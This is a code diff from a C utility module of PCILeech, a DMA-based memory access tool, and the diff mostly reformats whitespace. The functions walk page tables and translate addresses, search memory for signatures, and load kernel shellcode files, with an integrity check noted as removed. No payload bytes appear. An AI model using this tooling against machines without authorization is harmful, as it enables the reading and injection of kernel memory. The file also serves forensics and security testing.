+            if(!result) {
+                qwA += 0x0000000040000000;
+                qwA &= 0xffffffffC0000000;
+                continue;
+            }
+            PD_idx = 0xfff;
+        }
+        if(PD_idx != (0x1ff & (qwA >> 21))) { // PD (Page Directory)
+            PD_idx = 0x1ff & (qwA >> 21);
+            qwPageTableData = PD[PD_idx];
+            if(!Util_PageTable_FindSignatureBase_IsPageTableDataValid(qwPageTableData)) {
+                qwA += 0x0000000000200000;
+                qwA &= 0xffffffffffE00000;
+                continue;
+            }
+            result = Util_PageTable_FindSignatureBase_CachedReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PT, pbCache);
+            if(!result) {
+                qwA += 0x0000000000200000;
+                qwA &= 0xffffffffffE00000;
+                continue;
+            }
+        }
+        PTE = PT[0x1ff & (qwA >> 12)];
+        wSignature = (PTE & 0x07) | ((PTE >> 48) & 0x8000);
+        if(wSignature != pPTE->wSignature) { // signature do not match
+            qwA += 0x0000000000001000;
+            qwA &= 0xfffffffffffff000;
+            pPTE = pPTEs;
+            cPTE = 0;
+            cPTEPages = 0;
+            continue;
+        }
+        if(cPTE == 0 && cPTEPages == 0) {
+            *pqwSignatureBase = qwA;
+        }
+        cPTEPages++;
+        if(cPTEPages == pPTE->cPages) { // next page section
+            cPTE++;
+            pPTE = pPTEs + cPTE;
+            cPTEPages = 0;
+            if(pPTE->cPages == 0 || cPTE == cPTEs) { // found
+                return TRUE;
+            }
+        }
+        qwA += 0x1000;
+    }
+    *pqwSignatureBase = 0;
+    return FALSE;
+}
+
+BOOL Util_PageTable_Virtual2Physical(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwCR3, _In_ QWORD qwVA, _Out_ PQWORD pqwPA, _Out_ PQWORD pqwPageBase, _Out_ PQWORD pqwPageSize)
+{
+    BOOL result;
+    QWORD pqwPTE, qwPTEPA, qwPgLvl;
+    result = Util_PageTable_Helper(ctx, qwVA, 4, qwCR3, 0, 0, 0, &pqwPTE, &qwPTEPA, &qwPgLvl);
+    if(result && (qwPgLvl == 1)) {
+        *pqwPageSize = 0x1000;
+        *pqwPageBase = pqwPTE & 0x0000fffffffff000;
+        *pqwPA = *pqwPageBase + (qwVA % *pqwPageSize);
+        return TRUE;
+    }
+    if(result && (qwPgLvl == 2)) {
+        *pqwPageSize = 0x200000;
+        *pqwPageBase = pqwPTE & 0x0000ffffffe00000;
+        *pqwPA = *pqwPageBase + (qwVA % *pqwPageSize);
+        return TRUE;
+    }
+    return FALSE;
 }
 
 BOOL Util_PageTable_WindowsHintPML4(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PQWORD pqwCR3)
 {
-	BYTE pb[0x1000];
-	return
-		DeviceReadMEM(ctx, 0x1000, pb, 0x1000, 0) &&
-		((*(PQWORD)(pb + 0x78) & 0xfffffffffff00fff) == 0xffffffffffd00000) &&
-		((*(PQWORD)(pb + 0xa0) & 0xffffffff00000fff) == 0) &&
-		(*pqwCR3 = *(PQWORD)(pb + 0xa0));
-	return FALSE;
+    BYTE pb[0x1000];
+    return
+        DeviceReadMEM(ctx, 0x1000, pb, 0x1000, 0) &&
+        ((*(PQWORD)(pb + 0x78) & 0xfffffffffff00fff) == 0xffffffffffd00000) &&
+        ((*(PQWORD)(pb + 0xa0) & 0xffffffff00000fff) == 0) &&
+        (*pqwCR3 = *(PQWORD)(pb + 0xa0));
+    return FALSE;
 }
 
 BOOL Util_PageTable_FindSignatureBase(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PQWORD pqwCR3, _In_ PSIGNATUREPTE pPTEs, _In_ QWORD cPTEs, _Out_ PQWORD pqwSignatureBase)
 {
-	BOOL result;
-	QWORD qwRegCR3;
-	PBYTE pbCache;
-	// if page base (CR3) is specified -> use it.
-	if(!ctx->cfg->fPageTableScan) {
-		return Util_PageTable_FindSignatureBase_Search(ctx, NULL, *pqwCR3, pPTEs, cPTEs, pqwSignatureBase);
-	}
-	// try CR3/PML4 hint at PA 0x1000 on windows 8.1/10.
-	result = 
-		Util_PageTable_WindowsHintPML4(ctx, pqwCR3) && 
-		Util_PageTable_FindSignatureBase_Search(ctx, NULL, *pqwCR3, pPTEs, cPTEs, pqwSignatureBase);
-	if(result) { return TRUE; }
-	// page table scan guessing common CR3 base addresses.
-	pbCache = LocalAlloc(LMEM_ZEROINIT, 0x01000000);
-	for(qwRegCR3 = 0x100000; qwRegCR3 < 0x1000000; qwRegCR3 += 0x1000) {
-		if(Util_PageTable_FindSignatureBase_Search(ctx, pbCache, qwRegCR3, pPTEs, cPTEs, pqwSignatureBase)) {
-			*pqwCR3 = qwRegCR3;
-			LocalFree(pbCache);
-			return TRUE;
-		}
-	}
-	LocalFree(pbCache);
-	return FALSE;
+    BOOL result;
+    QWORD qwRegCR3;
+    PBYTE pbCache;
+    // if page base (CR3) is specified -> use it.
+    if(!ctx->cfg->fPageTableScan) {
+        return Util_PageTable_FindSignatureBase_Search(ctx, NULL, *pqwCR3, pPTEs, cPTEs, pqwSignatureBase);
+    }
+    // try CR3/PML4 hint at PA 0x1000 on windows 8.1/10.
+    result =
+        Util_PageTable_WindowsHintPML4(ctx, pqwCR3) &&
+        Util_PageTable_FindSignatureBase_Search(ctx, NULL, *pqwCR3, pPTEs, cPTEs, pqwSignatureBase);
+    if(result) { return TRUE; }
+    // page table scan guessing common CR3 base addresses.
+    pbCache = LocalAlloc(LMEM_ZEROINIT, 0x01000000);
+    for(qwRegCR3 = 0x100000; qwRegCR3 < 0x1000000; qwRegCR3 += 0x1000) {
+        if(Util_PageTable_FindSignatureBase_Search(ctx, pbCache, qwRegCR3, pPTEs, cPTEs, pqwSignatureBase)) {
+            *pqwCR3 = qwRegCR3;
+            LocalFree(pbCache);
+            return TRUE;
+        }
+    }
+    LocalFree(pbCache);
+    return FALSE;
 }
 
 BOOL Util_PageTable_FindMappedAddress(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwCR3, _In_ QWORD qwAddrPhys, _Out_ PQWORD pqwAddrVirt, _Out_opt_ PQWORD pqwPTE, _Out_opt_ PQWORD pqwPDE, _Out_opt_ PQWORD pqwPDPTE, _Out_opt_ PQWORD pqwPML4E)
 {
-	BOOL result, fFirstRun;
-	QWORD PML4[512], PDPT[512], PD[512], PT[512];
-	QWORD PML4_idx = 0xfff, PDPT_idx = 0xfff, PD_idx = 0xfff, PT_idx = 0xfff;
-	QWORD qwA;
-	QWORD qwPageTableData;
-	result = DeviceReadMEM(ctx, qwCR3 & 0x0000fffffffff000, (PBYTE)PML4, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	if(!result) { return FALSE; }
-	qwA = 0;
-	fFirstRun = TRUE;
-	while(qwA || fFirstRun) {
-		fFirstRun = FALSE;
-		if(qwA & 0xffff800000000000) {
-			qwA |= 0xffff800000000000;
-		}
-		if(PML4_idx != (0x1ff & (qwA >> 39))) { // PML4
-			PML4_idx = 0x1ff & (qwA >> 39);
-			qwPageTableData = PML4[PML4_idx];
-			if((qwPageTableData & 0x81) != 0x01) {
-				qwA = (qwA + 0x0000008000000000) & 0xffffff8000000000;
-				continue;
-			}
-			result = DeviceReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PDPT, 0x1000, 0);
-			if(!result) {
-				qwA = (qwA + 0x0000008000000000) & 0xffffff8000000000;
-				continue;
-			}
-			PDPT_idx = 0xfff;
-			PD_idx = 0xfff;
-			PT_idx = 0xfff;
-		}
-		if(PDPT_idx != (0x1ff & (qwA >> 30))) { // PDPT(Page-Directory Pointer Table)
-			PDPT_idx = 0x1ff & (qwA >> 30);
-			qwPageTableData = PDPT[PDPT_idx];
-			if((qwPageTableData & 0x81) != 0x01) {
-				qwA = (qwA + 0x0000000040000000) & 0xffffffffC0000000;
-				continue;
-			}
-			result = DeviceReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PD, 0x1000, 0);
-			if(!result) {
-				qwA = (qwA + 0x0000000040000000) & 0xffffffffC0000000;
-				continue;
-			}
-			PD_idx = 0xfff;
-			PT_idx = 0xfff;
-		}
-		if(PD_idx != (0x1ff & (qwA >> 21))) { // PD (Page Directory)
-			PD_idx = 0x1ff & (qwA >> 21);
-			qwPageTableData = PD[PD_idx];
-			if(((qwPageTableData & 0x81) == 0x81) && ((qwPageTableData & 0x0000ffffffe00000) == (qwAddrPhys & 0x0000ffffffe00000))) { // map 2MB page
-				*pqwAddrVirt = qwA + (qwAddrPhys & 0x1fffff);
-				if(pqwPTE) { *pqwPTE = PD[PD_idx]; }
-				if(pqwPDE) { *pqwPDE = PD[PD_idx]; }
-				if(pqwPDPTE) { *pqwPDPTE = PDPT[PDPT_idx]; }
-				if(pqwPML4E) { *pqwPML4E = PML4[PML4_idx]; }
-				return TRUE;
-			}
-			if((qwPageTableData & 0x81) != 0x01) {
-				qwA = (qwA + 0x0000000000200000) & 0xffffffffffE00000;
-				continue;
-			}
-			result = DeviceReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PT, 0x1000, 0);
-			if(!result) {
-				qwA = (qwA + 0x0000000000200000) & 0xffffffffffE00000;
-				continue;
-			}
-			PT_idx = 0xfff;
-		}
-		if(PT_idx != (0x1ff & (qwA >> 12))) { // PT (Page Table)
-			PT_idx = 0x1ff & (qwA >> 12);
-			qwPageTableData = PT[PT_idx];
-			if(((qwPageTableData & 0x01) == 0x01) && ((qwPageTableData & 0x0000fffffffff000) == (qwAddrPhys & 0x0000fffffffff000))) {
-				*pqwAddrVirt = qwA + (qwAddrPhys & 0xfff);
-				if(pqwPTE) { *pqwPTE = PT[PT_idx]; }
-				if(pqwPDE) { *pqwPDE = PD[PD_idx]; }
-				if(pqwPDPTE) { *pqwPDPTE = PDPT[PDPT_idx]; }
-				if(pqwPML4E) { *pqwPML4E = PML4[PML4_idx]; }
-				return TRUE;
-			}
-			qwA = (qwA + 0x0000000000001000) & 0xfffffffffffff000;
-			continue;
-		}
-	}
-	return FALSE;
+    BOOL result, fFirstRun;
+    QWORD PML4[512], PDPT[512], PD[512], PT[512];
+    QWORD PML4_idx = 0xfff, PDPT_idx = 0xfff, PD_idx = 0xfff, PT_idx = 0xfff;
+    QWORD qwA;
+    QWORD qwPageTableData;
+    result = DeviceReadMEM(ctx, qwCR3 & 0x0000fffffffff000, (PBYTE)PML4, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    if(!result) { return FALSE; }
+    qwA = 0;
+    fFirstRun = TRUE;
+    while(qwA || fFirstRun) {
+        fFirstRun = FALSE;
+        if(qwA & 0xffff800000000000) {
+            qwA |= 0xffff800000000000;
+        }
+        if(PML4_idx != (0x1ff & (qwA >> 39))) { // PML4
+            PML4_idx = 0x1ff & (qwA >> 39);
+            qwPageTableData = PML4[PML4_idx];
+            if((qwPageTableData & 0x81) != 0x01) {
+                qwA = (qwA + 0x0000008000000000) & 0xffffff8000000000;
+                continue;
+            }
+            result = DeviceReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PDPT, 0x1000, 0);
+            if(!result) {
+                qwA = (qwA + 0x0000008000000000) & 0xffffff8000000000;
+                continue;
+            }
+            PDPT_idx = 0xfff;
+            PD_idx = 0xfff;
+            PT_idx = 0xfff;
+        }
+        if(PDPT_idx != (0x1ff & (qwA >> 30))) { // PDPT(Page-Directory Pointer Table)
+            PDPT_idx = 0x1ff & (qwA >> 30);
+            qwPageTableData = PDPT[PDPT_idx];
+            if((qwPageTableData & 0x81) != 0x01) {
+                qwA = (qwA + 0x0000000040000000) & 0xffffffffC0000000;
+                continue;
+            }
+            result = DeviceReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PD, 0x1000, 0);
+            if(!result) {
+                qwA = (qwA + 0x0000000040000000) & 0xffffffffC0000000;
+                continue;
+            }
+            PD_idx = 0xfff;
+            PT_idx = 0xfff;
+        }
+        if(PD_idx != (0x1ff & (qwA >> 21))) { // PD (Page Directory)
+            PD_idx = 0x1ff & (qwA >> 21);
+            qwPageTableData = PD[PD_idx];
+            if(((qwPageTableData & 0x81) == 0x81) && ((qwPageTableData & 0x0000ffffffe00000) == (qwAddrPhys & 0x0000ffffffe00000))) { // map 2MB page
+                *pqwAddrVirt = qwA + (qwAddrPhys & 0x1fffff);
+                if(pqwPTE) { *pqwPTE = PD[PD_idx]; }
+                if(pqwPDE) { *pqwPDE = PD[PD_idx]; }
+                if(pqwPDPTE) { *pqwPDPTE = PDPT[PDPT_idx]; }
+                if(pqwPML4E) { *pqwPML4E = PML4[PML4_idx]; }
+                return TRUE;
+            }
+            if((qwPageTableData & 0x81) != 0x01) {
+                qwA = (qwA + 0x0000000000200000) & 0xffffffffffE00000;
+                continue;
+            }
+            result = DeviceReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PT, 0x1000, 0);
+            if(!result) {
+                qwA = (qwA + 0x0000000000200000) & 0xffffffffffE00000;
+                continue;
+            }
+            PT_idx = 0xfff;
+        }
+        if(PT_idx != (0x1ff & (qwA >> 12))) { // PT (Page Table)
+            PT_idx = 0x1ff & (qwA >> 12);
+            qwPageTableData = PT[PT_idx];
+            if(((qwPageTableData & 0x01) == 0x01) && ((qwPageTableData & 0x0000fffffffff000) == (qwAddrPhys & 0x0000fffffffff000))) {
+                *pqwAddrVirt = qwA + (qwAddrPhys & 0xfff);
+                if(pqwPTE) { *pqwPTE = PT[PT_idx]; }
+                if(pqwPDE) { *pqwPDE = PD[PD_idx]; }
+                if(pqwPDPTE) { *pqwPDPTE = PDPT[PDPT_idx]; }
+                if(pqwPML4E) { *pqwPML4E = PML4[PML4_idx]; }
+                return TRUE;
+            }
+            qwA = (qwA + 0x0000000000001000) & 0xfffffffffffff000;
+            continue;
+        }
+    }
+    return FALSE;
 }
 
 BOOL Util_HexAsciiToBinary(_In_ LPSTR sz, _Out_ PBYTE pb, _In_ DWORD cb, _Out_ PDWORD pcb)
 {
-	SIZE_T i, csz = strlen(sz);
-	*pcb = (DWORD)(csz >> 1);
-	if((csz % 2) || (cb < *pcb)) { return FALSE; }
-	for(i = 0; i < *pcb; i++) {
-		if(!sscanf_s(sz + (i << 1), "%02x", (PDWORD)(pb + i))) { return FALSE; }
-	}
-	return TRUE;
+    SIZE_T i, csz = strlen(sz);
+    *pcb = (DWORD)(csz >> 1);
+    if((csz % 2) || (cb < *pcb)) { return FALSE; }
+    for(i = 0; i < *pcb; i++) {
+        if(!sscanf_s(sz + (i << 1), "%02x", (PDWORD)(pb + i))) { return FALSE; }
+    }
+    return TRUE;
 }
 
 DWORD Util_GetFileSize(_In_ LPSTR sz)
 {
-	FILE *pFile;
-	DWORD size;
-	if(fopen_s(&pFile, sz, "rb") || !pFile) { return 0; }
-	fseek(pFile, 0, SEEK_END); // seek to end of file
-	size = ftell(pFile); // get current file pointer
-	fclose(pFile);
-	return size;
+    FILE *pFile;
+    DWORD size;
+    if(fopen_s(&pFile, sz, "rb") || !pFile) { return 0; }
+    fseek(pFile, 0, SEEK_END); // seek to end of file
+    size = ftell(pFile); // get current file pointer
+    fclose(pFile);
+    return size;
 }
 
 BOOL Util_ParseHexFileBuiltin(_In_ LPSTR sz, _Out_ PBYTE pb, _In_ DWORD cb, _Out_ PDWORD pcb)
 {
-	SIZE_T i;
-	FILE *pFile;
-	BOOL result;
-	// 1: try load default
-	if(0 == memcmp("DEFAULT", sz, 7)) {
-		for(i = 0; i < (sizeof(SHELLCODE_DEFAULT) / sizeof(SHELLCODE_DEFAULT_STRUCT)); i++) {
-			if((0 == strcmp(SHELLCODE_DEFAULT[i].sz, sz)) && (SHELLCODE_DEFAULT[i].cb <= cb)) {					
-				memcpy(pb, SHELLCODE_DEFAULT[i].pb, SHELLCODE_DEFAULT[i].cb);
-				*pcb = SHELLCODE_DEFAULT[i].cb;
-				return TRUE;
-			}
-		}
-		return FALSE;
-	}
-	// 2: try load hex ascii
-	if(Util_HexAsciiToBinary(sz, pb, cb, pcb)) {
-		return TRUE;
-	}
-	if(0 == memcmp("-", sz, 2)) {
-		*pcb = 0;
-		return TRUE;
-	}
-	// 3: try load file
-	i = strnlen_s(sz, MAX_PATH);
-	if(i > 4 && i < MAX_PATH) { // try to load from file
-		if(fopen_s(&pFile, sz, "rb") || !pFile) { return FALSE; }
-		*pcb = (DWORD)fread(pb, 1, cb, pFile);
-		result = (0 != feof(pFile));
-		fclose(pFile);
-		return result;
-	}
-	return FALSE;
+    SIZE_T i;
+    FILE *pFile;
+    BOOL result;
+    // 1: try load default
+    if(0 == memcmp("DEFAULT", sz, 7)) {
+        for(i = 0; i < (sizeof(SHELLCODE_DEFAULT) / sizeof(SHELLCODE_DEFAULT_STRUCT)); i++) {
+            if((0 == strcmp(SHELLCODE_DEFAULT[i].sz, sz)) && (SHELLCODE_DEFAULT[i].cb <= cb)) {       
+                memcpy(pb, SHELLCODE_DEFAULT[i].pb, SHELLCODE_DEFAULT[i].cb);
+                *pcb = SHELLCODE_DEFAULT[i].cb;
+                return TRUE;
+            }
+        }
+        return FALSE;
+    }
+    // 2: try load hex ascii
+    if(Util_HexAsciiToBinary(sz, pb, cb, pcb)) {
+        return TRUE;
+    }
+    if(0 == memcmp("-", sz, 2)) {
+        *pcb = 0;
+        return TRUE;
+    }
+    // 3: try load file
+    i = strnlen_s(sz, MAX_PATH);
+    if(i > 4 && i < MAX_PATH) { // try to load from file
+        if(fopen_s(&pFile, sz, "rb") || !pFile) { return FALSE; }
+        *pcb = (DWORD)fread(pb, 1, cb, pFile);
+        result = (0 != feof(pFile));
+        fclose(pFile);
+        return result;
+    }
+    return FALSE;
 }
 
 BOOL Util_ParseSignatureLine(_In_ PSTR szLine, _In_ DWORD cSignatureChunks, _Out_ PSIGNATURE_CHUNK pSignatureChunks) {
-	LPSTR szToken, szContext = NULL;
-	PSIGNATURE_CHUNK pChunk;
-	SIZE_T i;
-	BOOL result;
-	if(!szLine || !strlen(szLine) || szLine[0] == '#') { return FALSE; }
-	for(i = 0; i < cSignatureChunks * 2; i++) {
-		pChunk = &pSignatureChunks[i / 2];
-		szToken = strtok_s(szLine, ",:;", &szContext);
-		szLine = NULL;
-		if(!szToken) { return FALSE; }
-		if(i % 2 == 0) {
-			if(szToken[0] == '*') {
-				pChunk->tpOffset = SIGNATURE_CHUNK_TP_OFFSET_ANY;
-			} else {
-				if(szToken[0] == 'r') {
-					pChunk->tpOffset = SIGNATURE_CHUNK_TP_OFFSET_RELATIVE;
-					szToken = &szToken[1];
-				}
-				pChunk->cbOffset = strtoul(szToken, NULL, 16);
-			}
-		} else {
-			result = Util_ParseHexFileBuiltin(szToken, pChunk->pb, sizeof(pChunk->pb), &pChunk->cb);
-			if(!result) { return FALSE; }
-		}
-	}
-	return TRUE;
+    LPSTR szToken, szContext = NULL;
+    PSIGNATURE_CHUNK pChunk;
+    SIZE_T i;
+    BOOL result;
+    if(!szLine || !strlen(szLine) || szLine[0] == '#') { return FALSE; }
+    for(i = 0; i < cSignatureChunks * 2; i++) {
+        pChunk = &pSignatureChunks[i / 2];
+        szToken = strtok_s(szLine, ",:;", &szContext);
+        szLine = NULL;
+        if(!szToken) { return FALSE; }
+        if(i % 2 == 0) {
+            if(szToken[0] == '*') {
+                pChunk->tpOffset = SIGNATURE_CHUNK_TP_OFFSET_ANY;
+            } else {
+                if(szToken[0] == 'r') {
+                    pChunk->tpOffset = SIGNATURE_CHUNK_TP_OFFSET_RELATIVE;
+                    szToken = &szToken[1];
+                }
+                pChunk->cbOffset = strtoul(szToken, NULL, 16);
+            }
+        } else {
+            result = Util_ParseHexFileBuiltin(szToken, pChunk->pb, sizeof(pChunk->pb), &pChunk->cb);
+            if(!result) { return FALSE; }
+        }
+    }
+    return TRUE;
 }
 
 BOOL Util_LoadSignatures(_In_ LPSTR szSignatureName, _In_ LPSTR szFileExtension, _Out_ PSIGNATURE pSignatures, _In_ PDWORD cSignatures, _In_ DWORD cSignatureChunks)
 {
-	BYTE pbFile[0x10000];
-	DWORD cbFile = 0, cSignatureIdx = 0;
-	CHAR szSignatureFile[MAX_PATH];
-	FILE *pFile;
-	LPSTR szContext = NULL, szLine;
-	memset(pSignatures, 0, *cSignatures * sizeof(SIGNATURE));
-	// open and read file
-	Util_GetFileInDirectory(szSignatureFile, szSignatureName);
-	if(_strnicmp(szSignatureFile + strlen(szSignatureFile) - strlen(szFileExtension), szFileExtension, MAX_PATH)) { // add extension if missing
-		strcpy_s(szSignatureFile + strlen(szSignatureFile), MAX_PATH - strlen(szSignatureFile), szFileExtension);
-	}
-	if(fopen_s(&pFile, szSignatureFile, "rb") || !pFile) { return FALSE; }
-	memset(pbFile, 0, 0x10000);
-	cbFile = (DWORD)fread(pbFile, 1, 0x10000, pFile);
-	fclose(pFile);
-	if(!cbFile || cbFile == 0x10000) { return FALSE; }
-	// parse file
-	szLine = strtok_s((char*)pbFile, "\r\n", &szContext);
-	while(szLine && cSignatureIdx < *cSignatures) {
-		if(Util_ParseSignatureLine(szLine, cSignatureChunks, pSignatures[cSignatureIdx].chunk)) {
-			cSignatureIdx++;
-		}
-		szLine = strtok_s(NULL, "\r\n", &szContext);
-	}
-	*cSignatures = cSignatureIdx;
-	return (cSignatureIdx > 0);
+    BYTE pbFile[0x10000];
+    DWORD cbFile = 0, cSignatureIdx = 0;
+    CHAR szSignatureFile[MAX_PATH];
+    FILE *pFile;
+    LPSTR szContext = NULL, szLine;
+    memset(pSignatures, 0, *cSignatures * sizeof(SIGNATURE));
+    // open and read file
+    Util_GetFileInDirectory(szSignatureFile, szSignatureName);
+    if(_strnicmp(szSignatureFile + strlen(szSignatureFile) - strlen(szFileExtension), szFileExtension, MAX_PATH)) { // add extension if missing
+        strcpy_s(szSignatureFile + strlen(szSignatureFile), MAX_PATH - strlen(szSignatureFile), szFileExtension);
+    }
+    if(fopen_s(&pFile, szSignatureFile, "rb") || !pFile) { return FALSE; }
+    memset(pbFile, 0, 0x10000);
+    cbFile = (DWORD)fread(pbFile, 1, 0x10000, pFile);
+    fclose(pFile);
+    if(!cbFile || cbFile == 0x10000) { return FALSE; }
+    // parse file
+    szLine = strtok_s((char*)pbFile, "\r\n", &szContext);
+    while(szLine && cSignatureIdx < *cSignatures) {
+        if(Util_ParseSignatureLine(szLine, cSignatureChunks, pSignatures[cSignatureIdx].chunk)) {
+            cSignatureIdx++;
+        }
+        szLine = strtok_s(NULL, "\r\n", &szContext);
+    }
+    *cSignatures = cSignatureIdx;
+    return (cSignatureIdx > 0);
 }
 
 VOID Util_GetFileInDirectory(_Out_ CHAR szPath[MAX_PATH], _In_ LPSTR szFileName)
 {
-	SIZE_T i, cchFileName = strlen(szFileName);
-	GetModuleFileNameA(NULL, (LPSTR)szPath, (DWORD)(MAX_PATH - cchFileName - 4));
-	for(i = strlen(szPath) - 1; i > 0; i--) {
-		if(szPath[i] == '/' || szPath[i] == '\\') {
-			strcpy_s(&szPath[i + 1], MAX_PATH - i - 5, szFileName);
-			return;
-		}
-	}
+    SIZE_T i, cchFileName = strlen(szFileName);
+    GetModuleFileNameA(NULL, (LPSTR)szPath, (DWORD)(MAX_PATH - cchFileName - 4));
+    for(i = strlen(szPath) - 1; i > 0; i--) {
+        if(szPath[i] == '/' || szPath[i] == '\\') {
+            strcpy_s(&szPath[i + 1], MAX_PATH - i - 5, szFileName);
+            return;
+        }
+    }
 }
 
 DWORD Util_memcmpEx(_In_ PBYTE pb1, _In_ PBYTE pb2, _In_  DWORD cb)
 {
-	DWORD i;
-	for(i = 0; i < cb; i++) {
-		if(pb1[i] != pb2[i]) {
-			return i + 1;
-		}
-	}
-	return 0;
+    DWORD i;
+    for(i = 0; i < cb; i++) {
+        if(pb1[i] != pb2[i]) {
+            return i + 1;
+        }
+    }
+    return 0;
 }
 
 VOID Util_GenRandom(_Out_ PBYTE pb, _In_ DWORD cb)
 {
-	DWORD i = 0;
-	srand((unsigned int)GetTickCount64()); 
-	if(cb % 2) {
-		*(PBYTE)(pb) = (BYTE)rand();
-		i++;
-	}
-	for(;i <= cb - 2; i += 2) {
-		*(PWORD)(pb + i) = (WORD)rand();
-	}
+    DWORD i = 0;
+    srand((unsigned int)GetTickCount64());
+    if(cb % 2) {
+        *(PBYTE)(pb) = (BYTE)rand();
+        i++;
+    }
+    for(;i <= cb - 2; i += 2) {
+        *(PWORD)(pb + i) = (WORD)rand();
+    }
 }
 
-#define KMD_EXEC_MAX_SHELLCODE_SIZE		0x80000
+#define KMD_EXEC_MAX_SHELLCODE_SIZE        0x80000
 
 BOOL Util_LoadKmdExecShellcode(_In_ LPSTR szKmdExecName, _Out_ PKMDEXEC* ppKmdExec)
 {
-	CHAR szKmdExecFile[MAX_PATH];
-	PBYTE pbKmdExec;
-	DWORD cbKmdExec = 0, i;
-	PKMDEXEC pKmdExec;
-	FILE *pFile;
-	pbKmdExec = (PBYTE)LocalAlloc(LMEM_ZEROINIT, KMD_EXEC_MAX_SHELLCODE_SIZE);
-	if(!pbKmdExec) { return FALSE; }
-	// open and read file
-	if(0 == memcmp("DEFAULT", szKmdExecName, 7)) {
-		for(i = 0; i < (sizeof(SHELLCODE_DEFAULT) / sizeof(SHELLCODE_DEFAULT_STRUCT)); i++) {
-			if((0 == strcmp(SHELLCODE_DEFAULT[i].sz, szKmdExecName)) && (SHELLCODE_DEFAULT[i].cb <= KMD_EXEC_MAX_SHELLCODE_SIZE)) {
-				memcpy(pbKmdExec, SHELLCODE_DEFAULT[i].pb, SHELLCODE_DEFAULT[i].cb);
-				cbKmdExec = SHELLCODE_DEFAULT[i].cb;
-				break;
-			}
-		}
-	}
-	if(0 == cbKmdExec) {
-		Util_GetFileInDirectory(szKmdExecFile, szKmdExecName);
-		strcpy_s(szKmdExecFile + strlen(szKmdExecFile), MAX_PATH - strlen(szKmdExecFile), ".ksh");
-		if(fopen_s(&pFile, szKmdExecFile, "rb") || !pFile) { return FALSE; }
-		cbKmdExec = (DWORD)fread(pbKmdExec, 1, KMD_EXEC_MAX_SHELLCODE_SIZE, pFile);
-		fclose(pFile);
-		if(cbKmdExec < sizeof(KMDEXEC)) { goto error; }
-	}
-	// ensure file validity
-	pKmdExec = (PKMDEXEC)pbKmdExec;
-	if(pKmdExec->dwMagic != KMDEXEC_MAGIC) { goto error; }
-	// INFO: TODO: SHA256 integrity validation temporarily removed due to linux port.
-	// parse file
-	pKmdExec->cbShellcode = (pKmdExec->cbShellcode + 0xfff) & 0xfffff000; // align to 4k (otherwise dma write may fail)
-	pKmdExec->szOutFormatPrintf = (LPSTR)((QWORD)pKmdExec + (QWORD)pKmdExec->szOutFormatPrintf);
-	pKmdExec->pbShellcode = (PBYTE)((QWORD)pKmdExec + (QWORD)pKmdExec->pbShellcode);
-	*ppKmdExec = pKmdExec;
-	return TRUE;
+    CHAR szKmdExecFile[MAX_PATH];
+    PBYTE pbKmdExec;
+    DWORD cbKmdExec = 0, i;
+    PKMDEXEC pKmdExec;
+    FILE *pFile;
+    pbKmdExec = (PBYTE)LocalAlloc(LMEM_ZEROINIT, KMD_EXEC_MAX_SHELLCODE_SIZE);
+    if(!pbKmdExec) { return FALSE; }
+    // open and read file
+    if(0 == memcmp("DEFAULT", szKmdExecName, 7)) {
+        for(i = 0; i < (sizeof(SHELLCODE_DEFAULT) / sizeof(SHELLCODE_DEFAULT_STRUCT)); i++) {
+            if((0 == strcmp(SHELLCODE_DEFAULT[i].sz, szKmdExecName)) && (SHELLCODE_DEFAULT[i].cb <= KMD_EXEC_MAX_SHELLCODE_SIZE)) {
+                memcpy(pbKmdExec, SHELLCODE_DEFAULT[i].pb, SHELLCODE_DEFAULT[i].cb);
+                cbKmdExec = SHELLCODE_DEFAULT[i].cb;
+                break;
+            }
+        }
+    }
+    if(0 == cbKmdExec) {
+        Util_GetFileInDirectory(szKmdExecFile, szKmdExecName);
+        strcpy_s(szKmdExecFile + strlen(szKmdExecFile), MAX_PATH - strlen(szKmdExecFile), ".ksh");
+        if(fopen_s(&pFile, szKmdExecFile, "rb") || !pFile) { return FALSE; }
+        cbKmdExec = (DWORD)fread(pbKmdExec, 1, KMD_EXEC_MAX_SHELLCODE_SIZE, pFile);
+        fclose(pFile);
+        if(cbKmdExec < sizeof(KMDEXEC)) { goto error; }
+    }
+    // ensure file validity
+    pKmdExec = (PKMDEXEC)pbKmdExec;
+    if(pKmdExec->dwMagic != KMDEXEC_MAGIC) { goto error; }
+    // INFO: TODO: SHA256 integrity validation temporarily removed due to linux port.
+    // parse file
+    pKmdExec->cbShellcode = (pKmdExec->cbShellcode + 0xfff) & 0xfffff000; // align to 4k (otherwise dma write may fail)
+    pKmdExec->szOutFormatPrintf = (LPSTR)((QWORD)pKmdExec + (QWORD)pKmdExec->szOutFormatPrintf);
+    pKmdExec->pbShellcode = (PBYTE)((QWORD)pKmdExec + (QWORD)pKmdExec->pbShellcode);
+    *ppKmdExec = pKmdExec;
+    return TRUE;
 error:
-	LocalFree(pbKmdExec);
-	pKmdExec = NULL;
-	return FALSE;
+    LocalFree(pbKmdExec);
+    pKmdExec = NULL;
+    return FALSE;
 }
 
 QWORD Util_GetNumeric(_In_ LPSTR sz)
 {
-	if((strlen(sz) > 1) && (sz[0] == '0') && ((sz[1] == 'x') || (sz[1] == 'X'))) {
-		return strtoull(sz, NULL, 16); // Hex (starts with 0x)
-	} else {
-		return strtoull(sz, NULL, 10); // Not Hex -> try Decimal
-	}
+    if((strlen(sz) > 1) && (sz[0] == '0') && ((sz[1] == 'x') || (sz[1] == 'X'))) {
+        return strtoull(sz, NULL, 16); // Hex (starts with 0x)
+    } else {
+        return strtoull(sz, NULL, 10); // Not Hex -> try Decimal
+    }
 }
 
 VOID Util_CreateSignatureLinuxGeneric(_In_ QWORD paBase, 
